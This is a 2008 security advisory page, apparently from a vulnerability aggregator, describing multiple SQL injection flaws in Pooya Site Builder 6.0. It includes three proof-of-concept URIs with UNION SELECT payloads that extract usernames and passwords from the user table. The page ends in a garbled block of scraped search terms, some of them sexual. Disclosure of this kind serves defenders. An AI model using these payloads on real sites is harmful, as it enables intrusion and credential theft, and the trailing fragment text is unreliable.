exploits , vulnerabilities , articles , Pooya Site Builder Multiple SQL Injection Vulnerabilities

Title	Pooya Site Builder Multiple SQL Injection Vulnerabilities
Published	2008-06-11-12:00AM
Updated	2008-06-13-05:52PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	AmnPardaz Security Research & Penetration Testing Group
Vulnerable	Pooya Paridel Pooya Site Builder (PSB) 6.0
Not Vulnerable
Code	An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr] http://www.example.com/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1' http://www.example.com/utils/getXls.aspx?lnkIdn=-1&part=1 'from 'lnk' 'where' 1='2187 'union' all' 'select' 'CHAR(60)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62)%2bCHAR(60)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2b CHAR(60)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2bUsrNam%2bUsrPwd%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2b CHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62) 'from '[Usr] 'union 'all 'select' data1'
TXT

Vulnerabilities - newest 10 RSS | More

2008-09-06 Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities
2008-09-05 NetBSD ICMPv6 MLD Packet Remote Denial of Service Vulnerability
2008-09-05 Drupal Content Creation Kit Module Multiple HTML Injection Vulnerabilities
2008-09-05 HP OpenView Select Identity Connectors Local Information Disclosure Vulnerability
2008-09-05 eZoneScripts Dating Website Remote File Upload Vulnerability
2008-09-05 MicroTik RouterOS SNMP Security Bypass Vulnerability
2008-09-04 Dnsmasq DCHP Lease Multiple Remote Denial Of Service Vulnerabilities
2008-09-04 Zen Cart Multiple SQL Injection Vulnerabilities
2008-09-04 NETGEAR WN802T Wireless Access Point EAPoL Key Length Denial of Service Vulnerability
2008-09-04 Atheros Communications AR5416-AC1E Information Element Denial of Service Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sun, 07 Sep 2008 08:36:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo SEXY WELPA Www102030t admin.aspx Saniya pho 200 /compo Www+simren sex +image 200 /compo Black Sex big girl t mary@wkcas kernel loc www.Teensa Www.dasi b 200 /compo www.momshe the fatsw 200 /compo t306t suse 8.2 news for c hidu Vulnerabil sexyseen 200 /compo I want to 200 /compo www.momshe leah dizon Video anak Www sex co t673t 200 /compo www.domywi jatp sexyseen u s a free indiansix. e107 Forum 200 /compo Apache-Coy animal sex WWW.sex.18 bennykell@ sexso anim 200 /compo PICS OF SE looking se 200 /compo